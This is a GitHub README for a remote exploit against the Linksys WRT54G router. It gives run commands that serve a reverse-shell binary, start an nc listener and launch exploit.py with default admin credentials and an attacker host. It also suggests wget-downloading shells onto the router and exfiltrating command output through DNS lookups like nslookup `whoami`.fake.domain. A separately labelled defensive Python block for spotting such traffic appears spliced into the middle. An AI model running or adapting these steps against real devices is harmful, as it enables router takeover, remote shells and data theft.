
elongl / linksys-wrt54g

Licence: other
Exploiting Linksys WRT54G using a vulnerability I found.

Programming Languages

python
c


Exploiting Linksys WRT54G

Exploit

# Install the requirements.
pip install -r requirements.txt


ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin

ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141


# Start HTTP server in order to serve the reverse shell executable.
cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT

# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT

# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT

Leads for leaking command output

  • Look for file paths that are displayed within the web interface that command output can be written to.
    Example: using /tmp/ping.log to view the output at /Ping.asp.
  • Use wget to download reverse shell binary to the router.
  • Configure the attacker as the DNS server and force the router to issue DNS requests with the command output.
    For example: nslookup `whoami`.fake.domain
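
From the defender's side, the steps and leads above all make the router originate traffic it normally never sends: an HTTP fetch from a LAN client, a TCP connection back to a LAN client, and DNS queries to a resolver other than its upstream. The following is an added example, not code from this project, that flags those flows in a LAN capture; the record format, the baseline policy and the resolver address are assumptions, while the router and client addresses and ports are the ones used in the commands above.

```python
import ipaddress

# Assumptions (not from the project): flow records are "src dst proto dport"
# lines from a LAN tap, and the router's baseline is "no TCP to LAN clients,
# DNS only to the configured upstream resolver".
ROUTER = ipaddress.ip_address("192.169.1.1")      # address used in the README
LAN = ipaddress.ip_network("192.169.1.0/24")
APPROVED_RESOLVERS = {ipaddress.ip_address("203.0.113.53")}  # constructed

# Constructed sample flows.
SAMPLE_FLOWS = """\
192.169.1.100 192.169.1.1 tcp 80
192.169.1.1 203.0.113.53 udp 53
192.169.1.1 192.169.1.100 tcp 8000
192.169.1.1 192.169.1.100 tcp 4141
192.169.1.1 192.169.1.100 udp 53
192.169.1.23 198.51.100.7 tcp 443
not a flow record
"""

def parse_flow(line):
    """Return (src, dst, proto, dport) or None for malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    try:
        return (ipaddress.ip_address(parts[0]), ipaddress.ip_address(parts[1]),
                parts[2].lower(), int(parts[3]))
    except ValueError:
        return None

def router_anomalies(text):
    """List (reason, dst, dport) for router-originated flows off baseline."""
    findings = []
    for line in text.splitlines():
        flow = parse_flow(line)
        if flow is None or flow[0] != ROUTER:
            continue
        _, dst, proto, dport = flow
        if proto == "tcp" and dst in LAN:
            findings.append(("router-initiated TCP to LAN host", str(dst), dport))
        elif proto == "udp" and dport == 53 and dst not in APPROVED_RESOLVERS:
            findings.append(("DNS to unapproved resolver", str(dst), dport))
    return findings

if __name__ == "__main__":
    for finding in router_anomalies(SAMPLE_FLOWS):
        print(finding)
```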

TODOs

  • Use argparse and make the exploit an executable.

Unsolved Mysteries

  • If ui_language is stored in nvram (non-volatile RAM), how come it fixes itself upon reboot?

Links

Firmware
Toolchain
